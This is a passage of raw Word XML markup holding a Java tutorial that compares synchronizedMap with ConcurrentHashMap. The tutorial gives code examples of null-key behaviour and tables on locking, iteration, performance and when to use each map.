    <w:p w14:paraId="75E9914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Map&lt;String, Integer&gt; syncMap = Collections.synchronizedMap(new HashMap&lt;&gt;());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C775B1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A", 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EF270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B", 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B7FF1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 + syncMap);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC127BC" w14:textId="77777777" w:rsidR="00D96848" w:rsidRPr="00D96848" w:rsidRDefault="00D96848" w:rsidP="00D96848">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C1E3B1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oncurrentHashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECE2C2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Map&lt;String, Integer&gt; concurrentMap = new ConcurrentHashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2681FBE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X", 10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A9141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Y", 20);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6875CF3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ConcurrentHashMap: " + concurrentMap);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9C392C" w14:textId="77777777" w:rsidR="00D96848" w:rsidRPr="00D96848" w:rsidRDefault="00D96848" w:rsidP="00D96848">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2649F09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Trying null keys/values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9F1BF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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0056B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ncMap.put(null, 3);  // Works fine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140B02F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allows null key: " + syncMap);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057EAEA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atch (Exception e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68000BF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SynchronizedMap error: " + e);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D8233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52CC44C1" w14:textId="77777777" w:rsidR="00D96848" w:rsidRPr="00D96848" w:rsidRDefault="00D96848" w:rsidP="00D96848">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0176946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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2809A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concurrentMap.put(null, 3);  // Throws NullPointerException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440774D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 catch (NullPointerException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1AE06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System.out.println("ConcurrentHashMap does not allow null keys.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1FD05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4E89973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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7AF67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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4F0D9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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CA826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Map: {A=1, B=2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF963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ConcurrentHashMap: {X=10, Y=20}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737602F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Map allows null key: {null=3, A=1, B=2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115C9B9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ConcurrentHashMap does not allow null keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CAC6C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lastRenderedPageBreak/>
        <w:pict w14:anchorId="4C700C02">
          <v:rect id="_x0000_i7421" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="06398E7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3. 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3520"/>
        <w:gridCol w:w="4596"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D96848" w:rsidRPr="00D96848" w14:paraId="6EA540BF" w14:textId="77777777" w:rsidTr="00D96848">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="691B964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cenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62618905"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52D2737C"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1324086C" w14:textId="77777777" w:rsidTr="00D96848">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54B1E46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ingle-Threaded Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47936D5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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DD5EE4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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D96848" w:rsidRPr="00D96848" w14:paraId="6D53693A" w14:textId="77777777" w:rsidTr="00D96848">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6863C1D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ulti-Threaded Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5611490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702C44A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er (locks individual segments)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D96848" w:rsidRPr="00D96848" w14:paraId="12534DB5" w14:textId="77777777" w:rsidTr="00D96848">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33F8C1E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Read Operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6933305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6BD2D57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n-blocking reads (no lock required)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D96848" w:rsidRPr="00D96848" w14:paraId="7E32B06B" w14:textId="77777777" w:rsidTr="00D96848">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20D8E3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Write Operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BA65C7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lower (locks entire map)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="783757D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ster (locks only specific segments)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D96848" w:rsidRPr="00D96848" w14:paraId="095B2745" w14:textId="77777777" w:rsidTr="00D96848">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79A6F1E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ion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="149A2C1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ynchronized iteration, fail-fast behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79994E3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iteration (can see ongoing changes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="08FE430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pict w14:anchorId="01898D36">
          <v:rect id="_x0000_i7422" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5E4FE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4. Iteration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4128"/>
        <w:gridCol w:w="4045"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D96848" w:rsidRPr="00D96848" w14:paraId="7766A5D8" w14:textId="77777777" w:rsidTr="00D96848">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="462BAA5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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="143243D1"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67606098"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0F143104" w14:textId="77777777" w:rsidTr="00D96848">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37F54E9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Iterator Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58D60D0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Fail-fast (throws ConcurrentModificationException)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26BF2C5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Weakly consistent (does not throw exception during iteration)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D96848" w:rsidRPr="00D96848" w14:paraId="66DF15BF" w14:textId="77777777" w:rsidTr="00D96848">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14A9172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afe for Iteration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35EA35EB"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eeds manual synchronization while iterating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="752350C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afe for iteration even when other threads are modifying the map</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D96848" w:rsidRPr="00D96848" w14:paraId="79D811F9" w14:textId="77777777" w:rsidTr="00D96848">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17521B6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odification During Iteration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43F2F2A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t allowed (throws ConcurrentModificationException)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A5494AA"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Allowed (iteration reflects concurrent modifications)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="713683F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pict w14:anchorId="14FAF3FC">
          <v:rect id="_x0000_i7423" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53710347"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5. Limitations of SynchronizedHashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31979A5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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>entire map</w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is locked during every read and write operation, leading to significant performance degradation under high concurrency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200852B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imited Concurrency</w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Due to the global lock, only </w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can perform any operation at a time, reducing scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5949C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egacy</w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: SynchronizedHashMap is considered a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>legacy approach</w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and is not suitable for modern high-concurrency applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6F822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pict w14:anchorId="7A6EDA32">
          <v:rect id="_x0000_i7424" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E1C500"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6. Advantages of Concurrent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8382"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D96848" w:rsidRPr="00D96848" w14:paraId="3DE4B2DA" w14:textId="77777777" w:rsidTr="00D96848">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E4F63DF"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Advantage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06B737CF"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D96848" w:rsidRPr="00D96848" w14:paraId="475373C0" w14:textId="77777777" w:rsidTr="00D96848">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09AE26F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Higher Concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7918CBE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Allows </w:t>
            </w:r>
            <w:r w:rsidRPr="00D96848">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>multiple threads</w:t>
            </w:r>
            <w:r w:rsidRPr="00D96848">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> to concurrently read and write with less contention.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D96848" w:rsidRPr="00D96848" w14:paraId="62684C54" w14:textId="77777777" w:rsidTr="00D96848">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="678C58F3"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Better Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E3D581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Uses </w:t>
            </w:r>
            <w:r w:rsidRPr="00D96848">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>fine-grained locks</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lock striping</w:t>
            </w:r>
            <w:r w:rsidRPr="00D96848">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>, which improves performance in high-concurrency scenarios.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D96848" w:rsidRPr="00D96848" w14:paraId="6E9C41D3" w14:textId="77777777" w:rsidTr="00D96848">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56452FA5"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Non-blocking Reads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3741B3D2"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Read operations</w:t>
            </w:r>
            <w:r w:rsidRPr="00D96848">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> can happen concurrently without acquiring any lock.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D96848" w:rsidRPr="00D96848" w14:paraId="255D3222" w14:textId="77777777" w:rsidTr="00D96848">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B9620E1"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Weak Consistency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="497840D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Iteration is safe even during concurrent modification.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D96848" w:rsidRPr="00D96848" w14:paraId="1F5F4402" w14:textId="77777777" w:rsidTr="00D96848">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0358FFA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egmented Locking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="085426C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Locks only a specific segment</w:t>
            </w:r>
            <w:r w:rsidRPr="00D96848">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> for write operations, allowing better throughput.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24C0B34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pict w14:anchorId="09B598BB">
          <v:rect id="_x0000_i7425" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAB821E"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7. When to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0"/>
        <w:gridCol w:w="3882"/>
        <w:gridCol w:w="3632"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D96848" w:rsidRPr="00D96848" w14:paraId="32A5D645" w14:textId="77777777" w:rsidTr="00D96848">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41AB7704"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cenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A019E2E"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ynchronizedHashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B1E40B9"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ConcurrentHashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D96848" w:rsidRPr="00D96848" w14:paraId="56239C5C" w14:textId="77777777" w:rsidTr="00D96848">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F19DF79"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ingle-threaded or Low Concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E9EE698"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Suitable for low-concurrency applications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7101338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Overkill (use a regular HashMap)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D96848" w:rsidRPr="00D96848" w14:paraId="23C5D8AF" w14:textId="77777777" w:rsidTr="00D96848">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F32643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Moderate Concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B3C6AC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Suitable for </w:t>
            </w:r>
            <w:r w:rsidRPr="00D96848">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>moderate</w:t>
            </w:r>
            <w:r w:rsidRPr="00D96848">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17DA10D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 xml:space="preserve">Prefer </w:t>
            </w:r>
            <w:r w:rsidRPr="00D96848">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
